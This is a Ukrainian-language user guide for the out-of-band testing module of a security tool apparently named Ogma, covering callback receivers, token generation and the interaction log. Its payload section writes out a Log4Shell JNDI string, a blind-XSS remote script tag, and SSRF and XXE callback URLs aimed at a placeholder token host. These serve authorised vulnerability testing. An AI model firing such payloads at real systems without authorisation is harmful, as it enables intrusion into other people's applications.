OAST
OAST (Out-of-Band Application Security Testing) виявляє вразливості без видимої відповіді: натомість ціль встановлює вихідне з’єднання з приймачем, який ви контролюєте, підтверджуючи проблему.
Як це працює
Ogma запускає локальні приймачі для кількох протоколів. Коли цільовий застосунок звертається до одного з них, взаємодія записується з IP-адресою джерела, часом, отриманими даними й токеном, який було впроваджено.
Протоколи приймачів
| Протокол | Типовий порт | Використання |
|---|---|---|
| HTTP | Налаштовується | SSRF, сліпий XSS, вебхуки |
| HTTPS | Налаштовується | SSRF через TLS |
| DNS | Налаштовується | Сліпі ін’єкції, XXE, log4shell |
| SMTP | Налаштовується | Ін’єкція заголовків пошти, SSRF до поштових служб |
Налаштуйте порти приймачів і доменне ім’я для згенерованих токенів на панелі налаштувань OAST.
Створення токена зворотного виклику
- Відкрийте Утиліти > OAST.
- Натисніть + Створити, а потім Створити. Кожен токен унікальний для тесту.
- Скопіюйте токен. Він містить домен приймача й унікальний ідентифікатор для зіставлення взаємодій із конкретним тестом.
Приклад формату токена: [unique-id].[your-oast-domain]
Використання токенів у навантаженнях
Впроваджуйте токен зворотного виклику в будь-яке поле, через яке застосунок може встановити вихідне з’єднання:
- SSRF — використовуйте токен HTTP/HTTPS як цільовий URL:
https://[token]/ - XXE — посилайтеся на токен у DOCTYPE або URL зовнішньої сутності.
- Log4Shell — додайте в заголовок:
${jndi:ldap://[token]/a} - Сліпий XSS — використовуйте як src скрипта:
<script src="https://[token]/x.js"></script> - Ін’єкція SMTP — використовуйте як адресу призначення або URL у заголовках пошти.
Журнал взаємодій
Панель взаємодій показує кожен отриманий зворотний виклик:
| Стовпець | Опис |
|---|---|
| Час | Коли отримано взаємодію |
| Протокол | HTTP, HTTPS, DNS або SMTP |
| IP джерела | IP-адреса, що встановила з’єднання |
| Токен | До якого токена звернулися |
| Дані | Шлях запиту, ім’я запиту DNS або дані SMTP |
Натисніть будь-який рядок, щоб побачити повні подробиці взаємодії, зокрема заголовки й тіло запиту, де це доречно.
Зіставлення взаємодій із тестами
Оскільки кожен токен унікальний, можна впроваджувати різні токени в різні параметри або запити й точно визначати, яка точка ін’єкції спричинила зворотний виклик.